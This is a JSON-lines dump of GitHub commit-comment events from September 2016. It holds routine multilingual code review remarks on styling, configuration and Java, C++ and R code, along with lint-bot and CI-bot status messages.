{"id":"4630055082","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205858,"position":48,"line":48,"path":"src/less/singup.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:27:36Z","updated_at":"2016-09-28T11:27:36Z","body":"зачем префиксы в исходнике? autoprefixer в помощь"}},"created_at":"2016-09-28T11:27:36Z"}
{"id":"4630058935","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205866,"position":69,"line":44,"path":"src/AppBundle/Controller/SearchController.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:28:30Z","updated_at":"2016-09-28T11:28:30Z","body":"Faci acum baza de date si in momentul cand parcurgi acel folder le inserezi. Functia regex apartine de import. In Search tb doar sa interoghezi baza de date."}},"created_at":"2016-09-28T11:28:30Z"}
{"id":"4630060534","type":"CommitCommentEvent","actor":{"login":"theAirC"},"repo":{"name":"theAirC/SDL-mirror"},"payload":{"comment":{"id":19205868,"position":null,"line":null,"path":null,"commit_id":"8cb16eb9878918855e45cf93bce4a46822713b13","created_at":"2016-09-28T11:28:52Z","updated_at":"2016-09-28T11:28:52Z","body":"http://www.wreckedgames.com/forum/index.php?topic=5673.0"}},"created_at":"2016-09-28T11:28:52Z"}
{"id":"4630060758","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19205870,"position":21,"line":71,"path":"configure.ac","commit_id":"cbd6dffded0a5f88df14eae739febdb84b3a9053","created_at":"2016-09-28T11:28:56Z","updated_at":"2016-09-28T11:28:56Z","body":"s/SYSTEMD/WITH_SYSTEMD/"}},"created_at":"2016-09-28T11:28:56Z"}
{"id":"4630061990","type":"CommitCommentEvent","actor":{"login":"anamarialazar"},"repo":{"name":"lazarelena/SearchAI"},"payload":{"comment":{"id":19205871,"position":7,"line":7,"path":"src/AppBundle/GoodReadsAPI.php","commit_id":"f89e759c0cde25ce199a87a1f8effa2a6ccd10f9","created_at":"2016-09-28T11:29:14Z","updated_at":"2016-09-28T11:29:14Z","body":"Da. Request...e foarte general. Cerere de ce?"}},"created_at":"2016-09-28T11:29:14Z"}
{"id":"4630063102","type":"CommitCommentEvent","actor":{"login":"dlespiau"},"repo":{"name":"jcvenegas/hyperstart"},"payload":{"comment":{"id":19205872,"position":5,"line":5,"path":"data/hyperstart.service.in","commit_id":"cbd6dffded0a5f88df14eae739febdb84b3a9053","created_at":"2016-09-28T11:29:29Z","updated_at":"2016-09-28T11:29:29Z","body":"- @bindir@\r\n- BINARY_NAME doesn't exist anymore, we can just hardcode hyperstart"}},"created_at":"2016-09-28T11:29:29Z"}
{"id":"4630064213","type":"CommitCommentEvent","actor":{"login":"alviteri"},"repo":{"name":"Contortrix/contortrix"},"payload":{"comment":{"id":19205875,"position":null,"line":null,"path":null,"commit_id":"ecd19c9173796614a854cc4b72f1eacca3b9d4b1","created_at":"2016-09-28T11:29:45Z","updated_at":"2016-09-28T11:29:45Z","body":"@AdFad666 are you racist? xD xD xD xD"}},"created_at":"2016-09-28T11:29:45Z"}
{"id":"4630065753","type":"CommitCommentEvent","actor":{"login":"DodoVoelkel"},"repo":{"name":"samnabi/shopkit"},"payload":{"comment":{"id":19205879,"position":2,"line":1,"path":"site/languages/de.php","commit_id":"31d56565027b0e227d46f72b8f5cf01ab6e7b01a","created_at":"2016-09-28T11:30:07Z","updated_at":"2016-09-28T11:30:07Z","body":"I think thats a Typo there causing the site to not assemble properly. "}},"created_at":"2016-09-28T11:30:07Z"}
{"id":"4630066016","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205881,"position":127,"line":127,"path":"src/less/mansory.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:30:10Z","updated_at":"2016-09-28T11:30:10Z","body":"зачем каскад?"}},"created_at":"2016-09-28T11:30:10Z"}
{"id":"4630067230","type":"CommitCommentEvent","actor":{"login":"lptr"},"repo":{"name":"gradle/gradle"},"payload":{"comment":{"id":19205885,"position":null,"line":null,"path":null,"commit_id":"78058b2cd750a430226eb85ca74b848ac03d5fa6","created_at":"2016-09-28T11:30:28Z","updated_at":"2016-09-28T11:30:28Z","body":"I think the goal should be to make cross-compilatuon work with caching. Making caching work with overlapping outputs is not the goal."}},"created_at":"2016-09-28T11:30:28Z"}
{"id":"4630067571","type":"CommitCommentEvent","actor":{"login":"tista500"},"repo":{"name":"tista500/Adapta"},"payload":{"comment":{"id":19205886,"position":null,"line":null,"path":null,"commit_id":"16a8c04419f73872b0cc567ff7c0c609ee25f3d5","created_at":"2016-09-28T11:30:33Z","updated_at":"2016-09-28T11:30:33Z","body":"@albertsmuktupavels,\r\n\r\nI imagine:\r\n\r\n* Theme designer needs to consider the fact `headerbar.titlebar` style-class is shared with CSDs and SSDs applications (for example, gnome-terminal and nautilus will share that class).\r\n* `.ssd` and `.default-decoration` style-class are completely ignored in Metacity (but Mutter still needs them). So we need to add newer theming section only for Metacity.\r\n* Metacity does not have any specific style-class and/or node to theming.\r\n* When theming, our beloved CSS inspector does not help at all because window-frame elements are not listed in anywhere ( neither `GtkWindow` node nor `decoration` node). This fact happens in Mutter as well, but Muter is under perfect control via `.ssd .titlebar` and `decoration .titlebar` class.\r\n* Window-manager ignores margins outside of `button.titlebutton` style-class, it means Metacity will ignore the headerbar geometry if theme designers employed margin property to define the height of headerbar node. On the other hand, Mutter is OK because we can set specific spacing factors into `.ssd .titlebar` style-class with padding property.\r\n* Metacity's window-frame is very unclear which style-class and/or node is hooked. In my experiences, it will be enough with `headerbar.titlebar` class but I needed more precise selector for theming obviously. So we need to make  differences between `.csd headerbar.titlebar` and `@at-root headerbar.titlebar`. It means if designers did not have skills to do that, Metacity specific theming will not be realized and they will have to stick with classic XML based theming.\r\n\r\nHmm, sorry for my rough notes. ;)\r\n\r\nRegards."}},"created_at":"2016-09-28T11:30:33Z"}
{"id":"4630069967","type":"CommitCommentEvent","actor":{"login":"Sch3lp"},"repo":{"name":"pxlit-projects/classroom-exercise-2-SanderElsen"},"payload":{"comment":{"id":19205891,"position":null,"line":null,"path":null,"commit_id":"48898857fecfae499e99e52ef243c857238585e3","created_at":"2016-09-28T11:31:06Z","updated_at":"2016-09-28T11:31:06Z","body":"Nice! Die `@ResponseStatus` kende ik nog niet.\r\n\r\nIk heb ne pull request gesubmit, die een extra assertion toevoegt om te kijken of de location header ook correct gereturned wordt wanneer een POST succesvol is.\r\n\r\nGe gaat zien dat ge daarin ook een nieuwe id moet zetten op het Quote objectje.\r\n\r\nGL HF!"}},"created_at":"2016-09-28T11:31:06Z"}
{"id":"4630071176","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205892,"position":10,"line":10,"path":"src/less/inspirations.less","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:31:22Z","updated_at":"2016-09-28T11:31:22Z","body":"блок или элемент блока? "}},"created_at":"2016-09-28T11:31:22Z"}
{"id":"4630072474","type":"CommitCommentEvent","actor":{"login":"railsbrain"},"repo":{"name":"railsbrain/rail.github.io"},"payload":{"comment":{"id":19205894,"position":null,"line":null,"path":null,"commit_id":"4b17f3715e50f3eb39dc2fe3724afb244e6f0e12","created_at":"2016-09-28T11:31:40Z","updated_at":"2016-09-28T11:31:40Z","body":"added"}},"created_at":"2016-09-28T11:31:40Z"}
{"id":"4630076222","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205898,"position":28,"line":28,"path":"src/js/script.js","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:32:35Z","updated_at":"2016-09-28T11:32:35Z","body":"всё-таки через модификаторы лучше)"}},"created_at":"2016-09-28T11:32:35Z"}
{"id":"4630078382","type":"CommitCommentEvent","actor":{"login":"landro"},"repo":{"name":"digipost/saaj"},"payload":{"comment":{"id":19205902,"position":null,"line":null,"path":null,"commit_id":"fe02d272512207008413a5d8167a710a727f93a1","created_at":"2016-09-28T11:33:05Z","updated_at":"2016-09-28T11:33:05Z","body":"Most interesting @AcesHigh70 - we haven't seen the issue you describe in production... \r\nSince you have looked into this, have you tried making ContextClassloaderLocal thread safe? (as in providing a PR) "}},"created_at":"2016-09-28T11:33:05Z"}
{"id":"4630078895","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205905,"position":540,"line":540,"path":"dist/main.css","commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:33:12Z","updated_at":"2016-09-28T11:33:12Z","body":"тройной каскад, плохо("}},"created_at":"2016-09-28T11:33:12Z"}
{"id":"4630082486","type":"CommitCommentEvent","actor":{"login":"ademaro"},"repo":{"name":"vladyan/vladyan.github.io"},"payload":{"comment":{"id":19205909,"position":null,"line":null,"path":null,"commit_id":"085dbc8b2810724b33eeaf019f3c39fe7f72795e","created_at":"2016-09-28T11:34:03Z","updated_at":"2016-09-28T11:34:03Z","body":"всё в дивах, маловато семантики, как сам думаешь?"}},"created_at":"2016-09-28T11:34:03Z"}
{"id":"4630088739","type":"CommitCommentEvent","actor":{"login":"prithsharma"},"repo":{"name":"Kennytian/react-native-instabug"},"payload":{"comment":{"id":19205915,"position":22,"line":18,"path":"android/src/main/java/com/kenny/instabug/InstabugModule.java","commit_id":"4705797c01b422a05e40072694477fa9e5d007e8","created_at":"2016-09-28T11:35:30Z","updated_at":"2016-09-28T11:35:30Z","body":"This is breaking. `mInstabug` is the instance all methods run on."}},"created_at":"2016-09-28T11:35:30Z"}
{"id":"4630093977","type":"CommitCommentEvent","actor":{"login":"vczh"},"repo":{"name":"dingcc99/learnspace"},"payload":{"comment":{"id":19205924,"position":null,"line":null,"path":null,"commit_id":"cce04d5ef2103b22ad6ddc3507008f34f1c7fa46","created_at":"2016-09-28T11:36:46Z","updated_at":"2016-09-28T11:36:46Z","body":"要邀请我加入干啥？"}},"created_at":"2016-09-28T11:36:46Z"}
{"id":"4630098608","type":"CommitCommentEvent","actor":{"login":"OzgaRobert"},"repo":{"name":"spring-projects/spring-security"},"payload":{"comment":{"id":19205938,"position":4,"line":142,"path":"config/src/main/java/org/springframework/security/config/authentication/AuthenticationManagerBeanDefinitionParser.java","commit_id":"533a5f0905ca7c39406bb9baaa046176718d0d50","created_at":"2016-09-28T11:37:53Z","updated_at":"2016-09-28T11:37:53Z","body":"Hi\r\n\r\nWith this change there is a problem with registering multiple authentication-managers and making one of the the default one.\r\nThe last one defined will be used as default.\r\n\r\nIf bean does not have id it will be given BeanIds.AUTHENTICATION_MANAGER id and registered under it.\r\nIf bean does have an id it will be given alias BeanIds.AUTHENTICATION_MANAGER and register under it.\r\n\r\nThis causes big problems in oauth where different authentication managers are required for clients and users (resource owners)"}},"created_at":"2016-09-28T11:37:53Z"}
{"id":"4630099566","type":"CommitCommentEvent","actor":{"login":"mouse07410"},"repo":{"name":"OpenSC/libp11"},"payload":{"comment":{"id":19205939,"position":46,"line":351,"path":"src/p11_key.c","commit_id":"7573c6e800cae3b429ae018c6a6bcdfe61bc1b4b","created_at":"2016-09-28T11:38:06Z","updated_at":"2016-09-28T11:38:06Z","body":"In what standard do you find \"explicit PIN set on the slot\"?"}},"created_at":"2016-09-28T11:38:06Z"}
{"id":"4630100330","type":"CommitCommentEvent","actor":{"login":"mhaas"},"repo":{"name":"openwrt/packages"},"payload":{"comment":{"id":19205942,"position":null,"line":null,"path":null,"commit_id":"833da8b27395f83da429f7ca26877ffd91917124","created_at":"2016-09-28T11:38:16Z","updated_at":"2016-09-28T11:38:16Z","body":"Thanks for the update. Original maintainer here: I have become super busy. Would you like to take over?\n\nI had originally used forking instead of pthreads to avoid the dependency on libpthread. Is libpthread now included by default in the Openwrt base image?\n\nThe patch itself looks good, but I didn't get to test it."}},"created_at":"2016-09-28T11:38:16Z"}
{"id":"4630100743","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla/example-addon-repo"},"payload":{"comment":{"id":19205944,"position":null,"line":null,"path":null,"commit_id":"dfc4d87c07e9e47eae19dbc7021a7af833aed74d","created_at":"2016-09-28T11:38:21Z","updated_at":"2016-09-28T11:38:21Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#RNcX3b_HSgK09zIUmlIxBQ"}},"created_at":"2016-09-28T11:38:21Z"}
{"id":"4630102673","type":"CommitCommentEvent","actor":{"login":"drewxa"},"repo":{"name":"Alex-Kuz/cryptosha"},"payload":{"comment":{"id":19205951,"position":2,"line":5,"path":"xElement.cpp","commit_id":"4c18e3d1102b929e4291d2e5734e3ba75fd03011","created_at":"2016-09-28T11:38:48Z","updated_at":"2016-09-28T11:38:48Z","body":"убедили"}},"created_at":"2016-09-28T11:38:48Z"}
{"id":"4630103580","type":"CommitCommentEvent","actor":{"login":"Eriner"},"repo":{"name":"Eriner/zim"},"payload":{"comment":{"id":19205956,"position":null,"line":null,"path":null,"commit_id":"58aae6a8960c91f8de7f62ef64f0be356354a915","created_at":"2016-09-28T11:39:00Z","updated_at":"2016-09-28T11:39:00Z","body":"Now that I think about it, I'm worried users may update their submodules, do a `git add .` and commit them locally (or just have a dirty HEAD) and then have issues pulling from master when I update the submodule commit. I'm not sure if this is going to be an issue or not."}},"created_at":"2016-09-28T11:39:00Z"}
{"id":"4630104366","type":"CommitCommentEvent","actor":{"login":"robertjpayne"},"repo":{"name":"SnapKit/SnapKit"},"payload":{"comment":{"id":19205958,"position":null,"line":null,"path":null,"commit_id":"5c7ede844a7e190de05a1b14311c378358ea61c0","created_at":"2016-09-28T11:39:13Z","updated_at":"2016-09-28T11:39:13Z","body":"@NSLogMeng you may be able to, you may need to tweak some other parts but it should be ok."}},"created_at":"2016-09-28T11:39:13Z"}
{"id":"4630112333","type":"CommitCommentEvent","actor":{"login":"t1amat9409"},"repo":{"name":"t1amat9409/yaka"},"payload":{"comment":{"id":19205976,"position":7,"line":7,"path":"src/yaka.js","commit_id":"44cfd2a5c399be1030f4d029bf78f3b57335037c","created_at":"2016-09-28T11:41:03Z","updated_at":"2016-09-28T11:41:03Z","body":"Renamed from WD to YAKA\r\n"}},"created_at":"2016-09-28T11:41:03Z"}
{"id":"4630112362","type":"CommitCommentEvent","actor":{"login":"seungwonpark"},"repo":{"name":"gshslatexintro/latex.gs.hs.kr"},"payload":{"comment":{"id":19205977,"position":null,"line":null,"path":null,"commit_id":"ff36007b38d5d28914bd2eba45f1ce75f94807bb","created_at":"2016-09-28T11:41:03Z","updated_at":"2016-09-28T11:41:03Z","body":"지금 서버 오류로 인해(ㅠㅠ) 글이 자동으로 갱신되지 않고 있어요. 일단은 수동으로 갱신해드렸어요 ^^"}},"created_at":"2016-09-28T11:41:03Z"}
{"id":"4630114611","type":"CommitCommentEvent","actor":{"login":"acze"},"repo":{"name":"acze/contactForm"},"payload":{"comment":{"id":19205981,"position":9,"line":31,"path":"form.php","commit_id":"697b71ba87b335fde31d0daf78ad0e29052e9f68","created_at":"2016-09-28T11:41:34Z","updated_at":"2016-09-28T11:41:34Z","body":"Need to remove ```.text-center```"}},"created_at":"2016-09-28T11:41:34Z"}
{"id":"4630120601","type":"CommitCommentEvent","actor":{"login":"leomisfits"},"repo":{"name":"leomisfits/LP1E5"},"payload":{"comment":{"id":19205989,"position":null,"line":null,"path":null,"commit_id":"cfc49b6e0c599aa29a2cbc14de08c431d548cd1f","created_at":"2016-09-28T11:42:59Z","updated_at":"2016-09-28T11:42:59Z","body":"n era para ter apagado isso."}},"created_at":"2016-09-28T11:42:59Z"}
{"id":"4630120808","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19205990,"position":17,"line":5273,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-28T11:43:02Z","updated_at":"2016-09-28T11:43:02Z","body":"pgProvider? would be better to call it generically dbProvider of slProvider in case you really need to refer to the provider type?\r\n\r\n"}},"created_at":"2016-09-28T11:43:02Z"}
{"id":"4630122604","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19205996,"position":17,"line":5273,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-28T11:43:27Z","updated_at":"2016-09-28T11:43:27Z","body":"btw thank you to add sqlite support :)"}},"created_at":"2016-09-28T11:43:27Z"}
{"id":"4630130833","type":"CommitCommentEvent","actor":{"login":"seungwonpark"},"repo":{"name":"gshslatexintro/latex.gs.hs.kr"},"payload":{"comment":{"id":19206013,"position":null,"line":null,"path":null,"commit_id":"ff36007b38d5d28914bd2eba45f1ce75f94807bb","created_at":"2016-09-28T11:45:24Z","updated_at":"2016-09-28T11:45:24Z","body":"서버가 고쳐질 때까지는 계속해서 수동으로라도 갱신해 드릴테니 자유롭게 글 작성/수정하셔도 됩니다."}},"created_at":"2016-09-28T11:45:24Z"}
{"id":"4630131813","type":"CommitCommentEvent","actor":{"login":"littlewangxiang"},"repo":{"name":"littlewangxiang/mavenTest"},"payload":{"comment":{"id":19206017,"position":5,"line":12,"path":"target/classes/spring.xml","commit_id":"b332a26b2c315a419435e5e0da0d80f6b07227b3","created_at":"2016-09-28T11:45:38Z","updated_at":"2016-09-28T11:45:38Z","body":"add scan"}},"created_at":"2016-09-28T11:45:38Z"}
{"id":"4630136894","type":"CommitCommentEvent","actor":{"login":"jlecoeur"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19206023,"position":6,"line":122,"path":"mission/mission_handler_landing.hxx","commit_id":"87cd84a7fddc055208cd236a7d12d4eeb226bae4","created_at":"2016-09-28T11:46:46Z","updated_at":"2016-09-28T11:46:46Z","body":"Can you simplify this to \r\n```cpp\r\nif (ins_.position_lf()[Z] > desc_to_ground_altitude_) \r\n```\r\nand remove the 0.5m constant?"}},"created_at":"2016-09-28T11:46:46Z"}
{"id":"4630138115","type":"CommitCommentEvent","actor":{"login":"jesusAlbarregas"},"repo":{"name":"dawDos/trabajoClase"},"payload":{"comment":{"id":19206027,"position":null,"line":null,"path":null,"commit_id":"67dc09b26e69ccad84210619edc485e3574c8641","created_at":"2016-09-28T11:47:04Z","updated_at":"2016-09-28T11:47:04Z","body":"Hay que poner etiquetas html para mostrar tu nombre. Espero tus modificaciones en un nuevo PullRequest"}},"created_at":"2016-09-28T11:47:04Z"}
{"id":"4630138568","type":"CommitCommentEvent","actor":{"login":"luipir"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":19206029,"position":18,"line":5274,"path":"src/providers/spatialite/qgsspatialiteprovider.cpp","commit_id":"137a667dc2b623e51df1b4927c23cda67e298957","created_at":"2016-09-28T11:47:11Z","updated_at":"2016-09-28T11:47:11Z","body":"that means that relation can be searched only among layers belonging to the same sqlite db/table? there is a reason for this limitation?"}},"created_at":"2016-09-28T11:47:11Z"}
{"id":"4630140075","type":"CommitCommentEvent","actor":{"login":"gardir"},"repo":{"name":"gardir/Devilry_sort"},"payload":{"comment":{"id":19206035,"position":null,"line":null,"path":null,"commit_id":"2af04a1eb23766a644462270515ac6f7113fc5b3","created_at":"2016-09-28T11:47:31Z","updated_at":"2016-09-28T11:47:31Z","body":"Quite the contrare @MathiasCiarlo - we both know that this stuff is done when we have important stuff we _should_ do!"}},"created_at":"2016-09-28T11:47:31Z"}
{"id":"4630141124","type":"CommitCommentEvent","actor":{"login":"licaon-kter"},"repo":{"name":"siacs/Conversations"},"payload":{"comment":{"id":19206040,"position":null,"line":null,"path":null,"commit_id":"b0fb9fd9ee7ae8a9dc08159dcd4a718e08dcb314","created_at":"2016-09-28T11:47:45Z","updated_at":"2016-09-28T11:47:45Z","body":"So can I translate this or you need to mark it `translatable=\"false\"` ?"}},"created_at":"2016-09-28T11:47:45Z"}
{"id":"4630145941","type":"CommitCommentEvent","actor":{"login":"vickyprasad"},"repo":{"name":"vickyprasad/vicky"},"payload":{"comment":{"id":19206046,"position":2,"line":2,"path":".gitignore","commit_id":"b20e915c8955bd5c735f5ce576d1ecbb2c3d8a7b","created_at":"2016-09-28T11:48:48Z","updated_at":"2016-09-28T11:48:48Z","body":"{"}},"created_at":"2016-09-28T11:48:48Z"}
{"id":"4630145972","type":"CommitCommentEvent","actor":{"login":"dingqz"},"repo":{"name":"dingqz/Java"},"payload":{"comment":{"id":19206047,"position":null,"line":null,"path":null,"commit_id":"042cff3d5d9a8e4db6389bb14fc8dcec16843029","created_at":"2016-09-28T11:48:48Z","updated_at":"2016-09-28T11:48:48Z","body":"int[][] b = new int [3][4];   意味着b数组的3个元素b[0]b[1]b[2]的元素个数为4."}},"created_at":"2016-09-28T11:48:48Z"}
{"id":"4630156805","type":"CommitCommentEvent","actor":{"login":"jrieken"},"repo":{"name":"Microsoft/vscode"},"payload":{"comment":{"id":19206060,"position":30,"line":643,"path":"src/vs/vscode.d.ts","commit_id":"7f0e2adacf4a8740bda8b0a4049b34cb670eb30b","created_at":"2016-09-28T11:51:17Z","updated_at":"2016-09-28T11:51:17Z","body":"I take it back... didn't know that we added `lineNumbers` this milestone"}},"created_at":"2016-09-28T11:51:17Z"}
{"id":"4630160041","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19206062,"position":null,"line":null,"path":null,"commit_id":"e7f6bf7e37d7f701295eba4443a6bea80078eaed","created_at":"2016-09-28T11:52:05Z","updated_at":"2016-09-28T11:52:05Z","body":"Wonderful!"}},"created_at":"2016-09-28T11:52:05Z"}
{"id":"4630161533","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/prde"},"payload":{"comment":{"id":19206067,"position":null,"line":null,"path":null,"commit_id":"23bff92ab244939df5f8a856c22c783bfc6a96e8","created_at":"2016-09-28T11:52:25Z","updated_at":"2016-09-28T11:52:25Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/prde/blob/23bff92ab244939df5f8a856c22c783bfc6a96e8/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/prde/blob/23bff92ab244939df5f8a856c22c783bfc6a96e8/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/prde/blob/23bff92ab244939df5f8a856c22c783bfc6a96e8/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-28T11:52:25Z"}
{"id":"4630161798","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19206068,"position":null,"line":null,"path":null,"commit_id":"d32edee386f29909e6a4ac2fd5735c4b269308e7","created_at":"2016-09-28T11:52:29Z","updated_at":"2016-09-28T11:52:29Z","body":"Forgot to update first before merging my change so this one is a reput of toxic earlier commit"}},"created_at":"2016-09-28T11:52:29Z"}
{"id":"4630163099","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"richelbilderbeek/prde"},"payload":{"comment":{"id":19206074,"position":null,"line":null,"path":null,"commit_id":"11052f12825889fb35dd829b77e7ab4a75e34802","created_at":"2016-09-28T11:52:49Z","updated_at":"2016-09-28T11:52:49Z","body":"[R/do_magic.R:6:1:](https://github.com/richelbilderbeek/prde/blob/11052f12825889fb35dd829b77e7ab4a75e34802/R/do_magic.R#L6) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​{\n^\n```\n[R/do_magic.R:10:7:](https://github.com/richelbilderbeek/prde/blob/11052f12825889fb35dd829b77e7ab4a75e34802/R/do_magic.R#L10) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = x * 2;\n      ^\n```\n[R/do_magic.R:11:7:](https://github.com/richelbilderbeek/prde/blob/11052f12825889fb35dd829b77e7ab4a75e34802/R/do_magic.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​  out = replace(out, out == 84, 42);\n      ^\n```"}},"created_at":"2016-09-28T11:52:49Z"}
{"id":"4630164992","type":"CommitCommentEvent","actor":{"login":"mtaylor"},"repo":{"name":"andytaylor/activemq-artemis"},"payload":{"comment":{"id":19206075,"position":8,"line":68,"path":"artemis-protocols/artemis-amqp-protocol/src/main/java/org/apache/activemq/artemis/protocol/amqp/converter/jms/ServerJMSObjectMessage.java","commit_id":"b51de626b2fdbcb64ae71fd7eb2531402635feac","created_at":"2016-09-28T11:53:15Z","updated_at":"2016-09-28T11:53:15Z","body":"I'm not sure why you need to do this?  Is there more on the buffer you don't want to read?"}},"created_at":"2016-09-28T11:53:15Z"}
{"id":"4630165064","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19206076,"position":null,"line":null,"path":null,"commit_id":"51154c98f536e3a98d10ebc8d1118cfb7af0fec3","created_at":"2016-09-28T11:53:16Z","updated_at":"2016-09-28T11:53:16Z","body":"develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (2170 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-51154c98f536e3a98d10ebc8d1118cfb7af0fec3-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-88.64%25-red.svg)</a> \n"}},"created_at":"2016-09-28T11:53:16Z"}
{"id":"4630168230","type":"CommitCommentEvent","actor":{"login":"JAGFin1"},"repo":{"name":"linuxserver/odin"},"payload":{"comment":{"id":19206087,"position":null,"line":null,"path":null,"commit_id":"4fbaa9efdc41e4461b11896995e3b4f27c0b3bb5","created_at":"2016-09-28T11:54:02Z","updated_at":"2016-09-28T11:54:02Z","body":"In this scope {{post.id}} does not exist, as it's already within the {{post}} variable."}},"created_at":"2016-09-28T11:54:02Z"}
{"id":"4630174878","type":"CommitCommentEvent","actor":{"login":"ProgrammingWizzard"},"repo":{"name":"Pikselke/McHurtWorld"},"payload":{"comment":{"id":19206098,"position":41,"line":41,"path":"src/pl/pikselke/mchw/Main.java","commit_id":"491ca9bb24201378b9e09c7ba67e6d9faa71eed8","created_at":"2016-09-28T11:55:32Z","updated_at":"2016-09-28T11:55:32Z","body":"Też się doczepie tutaj dwóch rzeczy.\r\n\r\n- Dlaczego castujesz? Tutaj jest to bez sensu.\r\n- Można zamiast `Main.getPlugin();` dać `this`. Jednak to nie jest aż takim błędem :>"}},"created_at":"2016-09-28T11:55:32Z"}
{"id":"4630175881","type":"CommitCommentEvent","actor":{"login":"doughadfield"},"repo":{"name":"ccrisan/streameye"},"payload":{"comment":{"id":19206101,"position":null,"line":null,"path":null,"commit_id":"88fc2a5ce9a61c820b07df3578ce8546c0609e4c","created_at":"2016-09-28T11:55:45Z","updated_at":"2016-09-28T11:55:45Z","body":"Hi, you need to specify the core camera resolution as a minimum - so use the -w and -h (or --width and --height) arguments. the other arguments (--s_*) are for the network streaming resolution, if different from the core camera resolution (the picture sent to the preview HDMI screen). if they are not set, they default to the same as the core camera resolution (as set with the -w and -h arguments).\r\n\r\nAlso, you seem to have your height and width values round the wrong way  - you'll want width to be 1920 and height to be 1080.\r\n\r\nDoug\r\n"}},"created_at":"2016-09-28T11:55:45Z"}
{"id":"4630177485","type":"CommitCommentEvent","actor":{"login":"torongs82"},"repo":{"name":"BioinformaticsFMRP/TCGAbiolinks"},"payload":{"comment":{"id":19206104,"position":14,"line":57,"path":"R/TCGAanalyze.R","commit_id":"fdb6bb9f0ece8968ba7333b2a555a07d754e3d80","created_at":"2016-09-28T11:56:07Z","updated_at":"2016-09-28T11:56:07Z","body":"@tiagochst I think that the file .results presented some changes in colnames from raw_count to raw_counts"}},"created_at":"2016-09-28T11:56:07Z"}
{"id":"4630178266","type":"CommitCommentEvent","actor":{"login":"Badaboom1995"},"repo":{"name":"Badaboom1995/loftblog"},"payload":{"comment":{"id":19206105,"position":13,"line":13,"path":"basket.html","commit_id":"64970ea3ec235167d47a44d8f19ea7c81469ef62","created_at":"2016-09-28T11:56:17Z","updated_at":"2016-09-28T11:56:17Z","body":"Да, main-nav__list--active было бы логичнее"}},"created_at":"2016-09-28T11:56:17Z"}
{"id":"4630179047","type":"CommitCommentEvent","actor":{"login":"GregoireH"},"repo":{"name":"lis-epfl/MAVRIC_Library"},"payload":{"comment":{"id":19206107,"position":6,"line":122,"path":"mission/mission_handler_landing.hxx","commit_id":"87cd84a7fddc055208cd236a7d12d4eeb226bae4","created_at":"2016-09-28T11:56:27Z","updated_at":"2016-09-28T11:56:27Z","body":"But since the command position is desc_to_ground_altitude_, if the controller is not perfect and the drone remain a bit upper than the desired height, it will never finished the landing"}},"created_at":"2016-09-28T11:56:27Z"}
